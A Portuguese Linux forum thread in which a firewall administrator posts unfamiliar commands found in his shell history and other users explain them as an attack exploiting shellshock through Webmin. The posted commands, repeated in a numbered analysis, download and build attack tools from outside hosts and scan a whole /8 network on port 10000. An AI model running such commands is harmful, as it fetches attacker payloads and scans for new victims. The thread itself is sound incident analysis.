Dúvida sobre comandos que apareceram no SSH - possível ataque [RESOLVIDO]

netrixsa
(usa CentOS)

Enviado em 24/02/2017 - 09:12h

Bom dia a todos,

Eu sou meio leigo em comando linux, e aqui na empresa temos um firewall em linux.
De tempos em tempos tenho que fazer a limpeza do cache, para atrapalhar a navegação. Faço isso via interface.

Eu conecto via ssh, somente para ver o tamanho dos diretórios e saber se está quase cheio (df -h). E no ssh sempre fica os últimos comandos, só que dessa vez ao entrar percebi que tinha vários comandos que não tinha sido eu que tinha digitado, e somente eu tenho acesso.

Minha dúvida e o que seria esses comandos, logo abaixo:

mkdir /usr/games/work/; cd /usr/games/work/
wget grupo-bbva.net/ok.tgz; tar -zxvf ok.tgz >> /dev/null; rm -rf ok.tgz; cd ok
make clean
make lnx
rm -rf bash*
wget http://174.136.153.18/bash.txt; mv bash.txt bash.php; chmod +x bash.php; ls; cat root.pl
./pnscan -w"GET / HTTP/1.0\r\n\r\n" 179.0.0.0/8 10000 &
ps -x

Obs.: Internet ficou super lenta.

Se puderem me ajudar.

muriloguiraldini
(usa Ubuntu)

Enviado em 24/02/2017 - 10:49h

Qual Firewall você usa ?

Eu também entendo pouco, mas pelo que percebi, alguem baixou um script e executou ele em seu servidor.

Esse ip, provavelmente é camuflado, porque se você rastrear, ele bate em Michigan, EUA

Se tiver backup da configurações, eu recomendo reinstalar o firewall, e trocar todas a senhas de todos usuários.

Cheque também os logs de acesso do servidor, isso pode ajudar

netrixsa
(usa CentOS)

Enviado em 24/02/2017 - 13:20h

Firewall no Linux com IPTABLES


Vou verificar isso, obrigado.

di4s
(usa XUbuntu)

Enviado em 28/02/2017 - 17:00h

Oi.

Você realmente foi vitima de um ataque. É recomendável que você reinstale o seu sistema usando uma versão atualizada e utilizando regras de firewall mais especificas.

Eu não sou especialista, mas tentei fazer uma analise, o que consegui identificar foi o seguinte:

Já com acesso para executar comandos no seu sistema, o atacante executou esses comandos para, através da sua máquina, encontrar outros sistema vulneráveis. Assim, além de vitima, o seu sistema foi usado para atacar outros sistemas.

1. :~# mkdir /usr/games/work/; cd /usr/games/work/



2. :~# wget grupo-bbva.net/ok.tgz; tar -zxvf ok.tgz >> /dev/null; rm -rf ok.tgz; cd ok



3. :~# make clean



4. :~# make lnx



5. :~# rm -rf bash*



6. :~# wget http://174.136.153.18/bash.txt; mv bash.txt bash.php; chmod +x bash.php; ls; cat root.pl



7. :~# ./pnscan -w"GET / HTTP/1.0\r\n\r\n" 179.0.0.0/8 10000 &



8. :~# ps -x

 

As linhas de 1 até 4 foram usadas para fazer o download e instalar o pnscan no seu sistema. O pnscan é um portscan semelhante ao nmap.

Dentro do tarball ok.tgz, além do pnscan, existe um arquivo bash.original que foi apagado e substituído pelo arquivo bash.php através das linhas 5 e 6.

O arquivo bash.php é um script para ser usado na linha de comando. Esse script é capaz de atacar servidores web( com CGI ) aproveitando, o que parece ser a falha de segurança shellshock do bash.

Na linha 7, o atacante usou o pnscan para varrer toda uma rede /8 em busca de outros sistemas vulneráveis.

Como foram enviadas requisições HTTP para a porta 10000 de todos os IPs dessa rede, pesquisei sobre aplicações que utilizam essa porta e, por isso, penso que o atacante estava procurando usar o script bash.php em servidores com o webmin instalado.

Para terminar a linha 8, provavelmente, foi usada apenas para identificar se pnscan estava rodando de forma adequada.

Nesse ponto termina a analise dos comandos que você encontrou no seu sistema. Porém, o que o script bash.php faz quando o pnscan encontra um sistema vulnerável?

O script bash.php baixa e executa no sistema alvo o que parece ser um bot IRC escrito em perl, que apesar do pouco conhecimento que tenho nessa linguagem, acredito que seja capaz de testar e atacar algumas outras vulnerabilidades notificando os resultados para o atacante através de um servidor IRC.

Paulo Dias.
Linux Professional Institute - LPIC-1
Novell Certified Linux Administrator - CLA
Oracle Certified Associate, Java SE Programmer - OCA

http://twitter.com/p4ulodi4s
http://www.prminformatica.com.br/

netrixsa
(usa CentOS)

Enviado em 02/03/2017 - 10:33h

Muito obrigado pela explicação.

Irei trocar o sistema de firewall.

Uma dúvida, esse acesso ao Firewall, tem alguma analise para descobrir como ele conseguiu esse acesso?

di4s
(usa XUbuntu)

Enviado em 02/03/2017 - 11:16h

Penso que ele usou o script bash.php para ter acesso no seu sistema através do sistema de uma vitima que foi atacada antes de você.

Se estou certo, ele encontra um sistema vulnerável, consegue acesso nele e através desse faz novas vitimas. Isso dificulta qualquer tentativa de rastreamento.

Uma dúvida, no seu sistema está instalado o webmin?


Linux Professional Institute - LPIC-1
Novell Certified Linux Administrator - CLA
Oracle Certified Associate, Java SE Programmer - OCA

http://twitter.com/p4ulodi4s
http://www.prminformatica.com.br/

netrixsa
(usa CentOS)

Enviado em 02/03/2017 - 17:04h

Estava sim.

zenull
(usa Outra)

Enviado em 02/03/2017 - 17:22h

Como seu sistema foi comprometido, precisa reinstalar tudo do zero.
E deve analisar possibilidades de vulnerabilidades além do firewall.

di4s
(usa XUbuntu)

Enviado em 02/03/2017 - 17:42h

Bom, então é certo que foi através dele e da vulnerabilidade shellshock do bash que o seu sistema foi atacado.

Veja se esse ataque já foi relatado no site do webmin, deve ter uma atualização de segurança para corrigir isso.

Paulo Dias.
Linux Professional Institute - LPIC-1
Novell Certified Linux Administrator - CLA
Oracle Certified Associate, Java SE Programmer - OCA

http://twitter.com/p4ulodi4s
http://www.prminformatica.com.br/

netrixsa
(usa CentOS)

Enviado em 03/03/2017 - 09:43h

Ok,

Muito obrigado a todos que ajudaram.